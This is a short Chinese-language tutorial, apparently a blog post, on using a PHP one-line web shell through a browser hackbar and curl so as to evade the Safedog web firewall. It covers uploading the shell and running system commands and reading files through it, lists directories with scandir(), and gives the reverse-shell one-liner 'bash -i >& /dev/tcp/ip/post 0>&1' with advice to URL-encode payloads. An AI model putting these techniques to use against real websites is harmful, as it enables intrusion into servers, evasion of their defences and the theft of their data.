PHP一句话木马使用技巧 | 您所在的位置:网站首页 › php怎么打开file_get_contents › PHP一句话木马使用技巧 |
近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。 PHP一句话: firefox浏览器:hackbar 命令提示符:curl 首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站, 由于只是简单的一句话木马,因次一上车就收到了安全云的短信安全提示,正好可以用来测试免杀一句话,免得以后测试刚上传就被发现了。 利用hackbar链接木马利用system();执行系统命令 利用file_get_contents进行文件读取,然后用echo,或print打印出这个字符串。file_get_contents是将文件内容读入到一个字符串当中。 file_get_contents还可以替换成其他的函数 反弹shell,最重要的是记得进行url编码,不然会失败的 反射shell的语句有很多,这里是用的是最简单的bash -i >& /dev/tcp/ip/post 0>&1 利用curl链接一句话木马基本上跟上面一样,curl参数-X post 指定http方法为post --data 后面跟post的内容
scandir() 函数返回指定目录中的文件和目录的数组 反弹shell,也要经过编码才能反弹成功 总之,编码真的很重要。
|
CopyRight 2018-2019 实验室设备网 版权所有 |